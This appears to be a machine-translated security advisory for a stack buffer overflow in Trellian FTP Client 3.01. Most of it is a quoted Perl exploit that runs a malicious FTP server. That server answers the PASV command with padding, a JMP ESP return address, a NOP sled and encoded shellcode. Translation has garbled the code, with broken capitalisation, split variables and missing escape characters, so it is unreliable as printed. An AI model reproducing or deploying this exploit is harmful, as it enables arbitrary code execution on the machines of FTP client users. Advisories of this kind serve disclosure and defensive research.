Trellian FTP client PASV command Stack Overflow Vulnerability

Affected Versions:
Trellian FTP Client 3.01 vulnerability description:
Trellian FTP is a common FTP client.

The Trellian FTP client has the stack overflow vulnerability when processing FTP responses. If a user is cheated to connect to a malicious FTP server and receives a very long PASV response, this overflow can be triggered, resulting in arbitrary code execution on the user's machine.

<* Reference
Http://secunia.com/advisories/39370/
*>
Test method:

The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk!

# Exploit Title: Trellian FTP Client pasv bof exploit
# Date: 2010-04-11
# Author: zombiefx
# Software Link: http://www.trellian.com/bin/lu/dl/TrellianFTP.exe
# Version: Trellian ftpclient v 3.01
# Tested on: Windows XP SP3
# Usage:./ftpserver. pl
# Acts as a fake ftp server that passes the vulnerable PASV command when a clients connects.
# Code:
#! /Usr/bin/perl
Use warnings;
Use strict;
Use IO: Socket;
My $ ftpsock =
New IO: Socket: INET (LocalPort => 21, Proto => tcp, Listen => 1)
Or die "Socket Not Created $! ";
Print "###################################### #######################"
. "# Trellian FTP Client pasv bof exploit #"
. "# Author: zombiefx #"
. "# Greetz to: corelanc0d3r/Dino Dai Zovi #"
. "# Http://pentest.cryptocity.net/exploitation #"
. "# Http://www.corelan.be: 8800 #"
. "####################################### ######################";
My $ junk = "x41" x 200;
My $ jmpesp = pack (V, 0x7E429353); # oops
My $ nops = "x90" x 50;
My $ calcshell =
"X89xe2xdaxc1xd9x72xf4x58x50x59x49x49x49x49"
. "X43x43x43x43x43x43x51x5ax56x54x58x33x30x56"
. "X58x34x41x50x30x41x33x48x48x30x41x30x30x41"
. "X42x41x41x42x54x41x41x51x32x41x42x32x42x42x42"
. "X30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a"
. "X48x50x44x43x30x43x30x45x50x4cx4bx47x35x47"
. "X4cx4cx4bx43x4cx43x35x43x48x45x51x4ax4fx4c"
. "X4bx50x4fx42x38x4cx4bx51x4fx47x50x43x31x4a"
. "X4bx51x59x4cx4bx46x54x4cx4bx43x31x4ax4ex50"
. "X31x49x50x4cx59x4ex4cx4cx44x49x50x43x44x43"
. "X37x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4a"
. "X54x47x4bx51x44x46x44x43x34x42x55x4bx55x4c"
. "X4bx51x4fx51x34x45x51x4ax4bx42x46x4cx4bx44"
. "X4cx50x4bx4cx4bx51x4fx45x4cx45x51x4ax4bx4c"
. "X4bx45x4cx4cx4bx45x51x4ax4bx4dx59x51x4cx47"
. "X54x43x34x48x43x51x4fx46x51x4bx46x43x50x50"
. "X56x45x34x4cx4bx47x36x50x30x4cx4bx51x50x44"
. "X4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx45x38x43"
. "X38x4bx39x4ax58x4cx43x49x50x42x4ax50x50x42"
. "X48x4cx30x4dx5ax43x34x51x4fx45x38x4ax38x4b"
. "X4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43x45"
. "X31x42x4cx42x43x45x50x41x41 ";

While (my $ data = $ ftpsock-> accept ()){
Print "Client Connected! Awaiting Ftp commands :";
Print $ data "220 Welcome ;)! ";
While (<$ data> ){
Print;
Print $ data "331 Anonymous access allowed, send e-mail as password." if (/USER/I );
Print $ data "230-Welcome to the edevil server230 User logged in." if (/PASS/I );
Print $ data "257 rows /" is current directory." if (/PWD/gis );
Print $ data "227 Entering Passive Mode (". $ junk. $ jmpesp. $ nops. $ calcshell. ")." if (/PASV/I );
Print $ data "150 Here comes the directory listing.226 Directory send OK." if (/LIST/I );
}
}

 

Security suggestions:
Vendor patch:

Trellian
--------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Html> http://www.trellian.com/index.html